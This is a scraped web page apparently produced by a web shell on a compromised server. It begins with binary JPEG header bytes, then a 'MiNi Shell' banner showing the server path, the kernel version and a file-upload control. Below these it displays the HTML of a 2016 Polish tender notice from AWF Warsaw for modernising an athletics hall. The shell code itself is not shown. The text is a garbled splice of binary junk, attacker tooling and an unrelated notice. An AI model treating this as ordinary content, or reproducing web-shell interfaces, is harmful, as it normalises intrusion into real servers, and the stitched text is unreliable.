JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160726/158455-N-2016.html

<p class="kh_header"><b>Warszawa: Modernizacja hali lekkoatletycznej im. Janusza Kusocińskiego Akademii Wychowania Fizycznego Józefa Piłsudskiego                         w Warszawie.</b><br>
<b>Numer ogłoszenia: 158455 - 2016; data zamieszczenia: 26.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Wychowania Fizycznego Józefa Piłsudskiego , ul. Marymoncka 34, 00-968 Warszawa, woj. mazowieckie, tel. 834 05 14, faks 834 76 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> awf.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja hali lekkoatletycznej im. Janusza Kusocińskiego Akademii Wychowania Fizycznego Józefa Piłsudskiego                         w Warszawie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest modernizacja hali lekkoatletycznej im. Janusza Kusocińskiego Akademii Wychowania Fizycznego Józefa Piłsudskiego                         w Warszawie. 

2.	Szczegółowy opis przedmiotu zamówienia określa załącznik nr 2A, 2B, 2C do SIWZ. 
    2A - przedmiar robót,
     2B - Dokumentacja projektowa wraz ze Specyfikacją techniczną wykonania i odbioru   
  Robót
          2 C - opis przedmiotu zamówienia.  
3.	Gwarancja: Wykonawca zobowiązany jest udzielić gwarancji co najmniej 36 miesięcy na wykonane roboty budowlane oraz użyte materiały.    
Wykonawca może wydłużyć gwarancje na wykonane roboty budowlane oraz użyte  materiały o 24 miesiące (do 60 miesięcy).  
3.1. Warunki gwarancji jakości:
a)	wykonawca  udzieli Zamawiającemu gwarancji jakości na wykonane w ramach przedmiotu umowy roboty budowlane i użyte materiały,
b)	wykonawca zobowiązany jest do bezpłatnego wykonania przeglądów okresowych/serwisu dostarczonych i zamontowanych w ramach realizacji zamówienia urządzeń zgodnie z warunkami gwarancji w okresie jej trwania, 
c)	wykonawca zobowiązany jest do usuwania wad/usterek poprzez naprawę robót (w szczególności poprawienie wadliwie wykonanych robót) lub wymianę materiałów (w szczególności wymianę użytych wadliwych materiałów). 
4.	Wykonawca musi zapewnić sobie własne zaplecze budowy  w miejscu wskazanym przez Zamawiającego. 
5.	Materiały i urządzenia zastosowane do realizacji przedmiotu zamówienia muszą być oznakowane znakiem CE B, posiadać odpowiednie certyfikaty, być wolne od wad            i usterek oraz spełniać standardy jakościowe wyrobów dopuszczonych do obrotu              i stosowania w budownictwie, określonym w art. 10 ustawy PB.
6.	Uwaga! Roboty budowlane będą wykonywane na obiekcie czynnym. W części czynnej obiektu  musi być zapewniony dopływ mediów (szatnie, pomieszczenia biurowe i dydaktyczne, natryski).  
7.	Hala w okresie sezonu letniego stanowi obiekt rozgrzewkowy dla przebudowanego stadionu głównego. Wg  wymogów IAAF, nawierzchnia na stadionie głównym i na obiekcie rozgrzewkowym musi mieć te same parametry dynamiczne - stanowisko Polskiego Związku Lekkiej Atletyki.
8.	Wymagania dotyczące nawierzchni muszą być zgodne z dokumentacją techniczną. 
9.	 Wykonawca zobowiązany jest do uzyskania i przekazania Zamawiającemu świadectwa kwalifikacyjnego Polskiego Związku Lekkiej Atletyki, dla obiektu kategorii kat. IIIA, uwzględniając przepisy i wymagania PZLA w tym zakresie (zał. nr 2C do SIWZ)  

10.	Wykonawca na podstawie przedmiarów  stanowiących załącznik nr 2A, do niniejszej Specyfikacji zobowiązany jest do sporządzenia kosztorysu ofertowego w formie szczegółowej, oraz zestawienia materiałów (podanie nazw wszystkich zastosowanych materiałów), który dołączy do oferty. Wykonawca zobowiązany jest przy sporządzaniu kosztorysu ofertowego ująć wszystkie pozycje przedmiaru robót.
11.	W przypadku, gdy w dokumentacji projektowej wskazano nazwę producenta materiałów, urządzeń i wyposażenia Zamawiający dopuszcza składanie ofert równoważnych. Zakres równoważności określa załącznik nr zał. nr 2D do SIWZ.  
Ciężar udowodnienia, że oferowany przedmiot zamówienia jest równoważny i spełnia
wszystkie wymagania określone przez Zamawiającego w SIWZ spoczywa na Wykonawcy. 
12.	Zaleca się dokonanie wizji lokalnej w miejscu realizacji przedmiotu zamówienia w celu uzyskania niezbędnych informacji dla poprawnego i kompletnego przygotowania oferty. 
13.	Zamawiający informuje, iż w dniu 03.08.2016 o godz.12.00 odbędzie się wizja lokalna w siedzibie Zamawiającego. Wykonawcy uczestniczą w wizji lokalnej na swój koszt        i ryzyko. Uczestnictwo w wizji lokalnej nie jest obowiązkowe. Wykonawcy zamierzający uczestniczyć w wizji lokalnej, na dwa dni przed wizją, prześlą do Zamawiającego wykaz  osób, uczestniczących w wizji lokalnej. 
14.	W przypadku, gdy wyznaczony termin nie będzie odpowiadał, Wykonawca umówi się indywidualnie na wizję lokalną w innym terminie, kontakt jak w pkt XIII SIWZ.  
15.	W trakcie wizji lokalnej Wykonawca zobowiąże się do przestrzegania regulaminów bezpieczeństwa i higieny pracy.
16.	W celu zachowania zasady jawności postępowania w trakcie wizji nie będzie możliwości zadawania pytań i uzyskiwania odpowiedzi. Pytania do SIWZ będzie można zadawać pisemnie po wizji lokalnej, odpowiedzi będą udzielone i udostępnione wszystkim wykonawcom ubiegającym się o udzielenie zamówienia oraz na stronie internetowej Zamawiającego.  
17.	Zamawiający nie dopuszcza składania ofert częściowych i wariantowych.
18.	 Zamawiający na podstawie art. 29 ust. 4 pkt 4 ustawy Pzp wymaga, by przy realizacji zamówienia Wykonawca, z którym Zamawiający podpisze umowę skierował do realizacji umowy  10 pracowników zatrudnionych na umowę o pracę w pełnym wymiarze godzin na cały okres realizacji umowy.   
Wymóg ten dotyczy osób wykonujących bezpośrednie czynności niezbędne do realizacji zamówienia na terenie Uczelni  związane z modernizacją hali lekkoatletycznej, określone w Specyfikacji technicznej wykonania i odbioru robót i/lub kosztorysach.   
Przed podpisaniem umowy Wykonawca przedłoży Zamawiającemu listę pracowników zatrudnionych na umowę o pracę.  
Zamawiający na etapie realizacji umowy będzie żądał od wybranego Wykonawcy przedstawienia, w stosunku do tych osób umów o pracę zawartych na czas realizacji zamówienia, a także na każde wezwanie Zamawiającego Wykonawca musi przedstawić dokument potwierdzający opłacanie składek na ZUS dla tych osób..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-9, 45.11.11.00-1, 45.26.23.50-9, 45.26.26.00-6, 45.22.31.00-7, 45.32.00.00-6, 45.26.12.10-9, 45.30.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania zobowiązany jest wnieść wadium w polskiej	walucie, w wysokości 300.000,00 PLN (słownie: trzysta tysięcy złotych).   
Wadium będzie można wnieść w jednej lub kilku następujący formach:
1)	pieniądzu w formie przelewu bankowego na rachunek Zamawiającego w BZ WBK S.A14 O/Warszawa 97 1090 1014 0000 0001 0357 5951
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)	gwarancjach bankowych ;
4)	gwarancjach ubezpieczeniowych;
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158, z późn. zm.).
W przypadku wniesienia wadium w formach innych niż pieniądzu, złożone poręczenie lub gwarancja musi zawierać zobowiązanie zgodne z art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.   
Wniesienie wadium przelewem musi nastąpić w terminie gwarantującym uznanie rachunku AWF przed terminem składania ofert. Wadium wniesione w innych formach niż w pieniądzu należy złożyć w kasie Akademii Wychowania Fizycznego Józefa Piłsudskiego budynek Administracji piętro I -  ul. Marymoncka 34, Warszawa, poniedziałek i czwartek w godz. 08.00 - 13.00 przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny powyższego warunku w oparciu o złożone przez 	Wykonawcę oświadczenie w zakresie art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga, aby Wykonawcy: 
wykazali wykonanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum dwóch robót budowlanych polegających na budowie, remoncie, rozbudowie obiektu sportowego w zakres, którego wchodziłby wykonanie bieżni z nawierzchnią z pełnego poliuretanu lub kauczukową na kwotę nie mniejszą niż 10.000.000,00 zł brutto (dziesięć milionów zł.) każda. 
W przypadku podmiotów występujących wspólnie warunek ten podmioty mogą spełniać łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny powyższego warunku w oparciu o złożone przez 	Wykonawcę oświadczenie w zakresie art. 22 ust. 1.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie dysponowania:  
a)	kierownika budowy, posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz posiadającego uprawnienia do prac na obiektach zabytkowych w formie odbycia dwuletniej praktyki zawodowej na budowie przy zabytkach nieruchomych
b)	kierownika robót budowlanych, posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
d)	kierownika robót sanitarnych posiadającego uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych 
e)	kierownika robót elektrycznych posiadającego uprawnienia elektryczne do kierowania robotami elektrycznymi w specjalności instalacje elektryczne. 
W przypadku podmiotów występujących wspólnie warunek ten podmioty mogą 	spełniać 
łącznie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W tym zakresie Zamawiający wymaga aby Wykonawcy:
Wykazali, że są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min 10.000.000,00 (słownie: dziesięć milionów złotych). 
W przypadku wygaśnięcia ważności w/w dokumentu w trakcie realizacji umowy Wykonawca będzie zobowiązany do przedłożenia aktualnego. 
W przypadku podmiotów występujących wspólnie warunek ten podmioty mogą spełniać 
łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Zaświadczenia niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym. tj.  
a)	karty technicznej oferowanej nawierzchni. 
b)	certyfikat  IAAF Indoor Athletics  Facility Certificate kat. I. dla obiektu wykonanego z oferowanego systemu nawierzchniowego odpowiadającego wymaganym parametrom 
c)	autoryzację producenta dla wszystkich nawierzchni wystawioną w oryginale dla wykonawcy dotyczącą konkretnego zadania,
d)	wyniki badań wykonanych przez niezależne akredytowane laboratorium badające nawierzchnie sportowe potwierdzające parametry techniczne nawierzchni,
e)	aktualny atest higieniczny lub dokument równoważny, 
f)	kompletny raport zawierający wyniki badań wykonanych przez niezależne akredytowane laboratorium badające nawierzchnie sportowe potwierdzające parametry techniczne nawierzchni wydany w celu uzyskania certyfikatu produktowego tzw. Product Certyficate 
g)	kompletny raport z badań na zgodność z ochroną środowiska naturalnego wydany przez laboratorium upoważnione do badan, określające  zawartości metali ciężkich.
h)	próbek dla wszystkich oferowanych nawierzchni. 
Dokumenty sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony i podpisany formularz oferty stanowiący załącznik nr 1 do SIWZ
2. 	Wypełniony i podpisany kosztorys ofertowy sporządzony na podstawie przedmiarów robót w formie szczegółowej - załącznik nr 2A do SIWZ, wraz z  zestawieniem materiałów (wymagane jest podanie nazw wszystkich zastosowanych materiałów wraz z podaniem ich producentów ew. nr katalogowych produktu).
3.	Załącznik nr 8 do SIWZ (informację o zakresie dostaw powierzonych podwykonawcom) musi być przedłożony tylko w przypadku, jeśli Wykonawca zamierza powierzyć cześć lub całość zamówienia podwykonawcom.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - wydłużenie gwarancji - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający  przewiduje możliwość zmiany warunków umowy:
1. W zakresie terminów, o czas trwania przeszkody w następujących przypadkach:
1)	 jeżeli przyczyny, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót będą następstwem okoliczności, za które odpowiedzialność ponosi Zamawiający, w szczególności będą następstwem nieterminowego przekazania terenu budowy, konieczności zmian dokumentacji projektowej w zakresie w jakim ww. okoliczności miały lub będą mogły mieć wpływ na dotrzymanie terminu zakończenia robót,
2)	 gdy wystąpi konieczność udzielenia robót dodatkowych;    
3)	 gdy wystąpią opóźnienia w dokonaniu określonych czynności lub ich zaniechanie przez właściwe organy administracji państwowej, które nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność, 
4)	 jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczenia do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ z przyczyn niezależnych od Wykonawcy.  
5)	 wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami (np. klęski żywiołowej, strajki generalne lub lokalne). 
2.	W zakresie wynagrodzenia umownego, 
1)	  w przypadku niewykonania robót zaniechanych.   
2)	w przypadku zmiany: 
                       a) stawki podatku od towarów i usług; 
b)	wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie   
     art. 2 ust 3-5 ustawy z dnia 10 października 2002 r. o minimalnym    
     wynagrodzeniu za pracę (Dz. U. z 2002 r. nr 200, poz. 1679 ze zm. )
c)	zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu   
           zdrowotnemu lub wysokości stawki składki na ubezpieczenie społeczne lub    
          zdrowotne. 
    - jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez     
    Wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
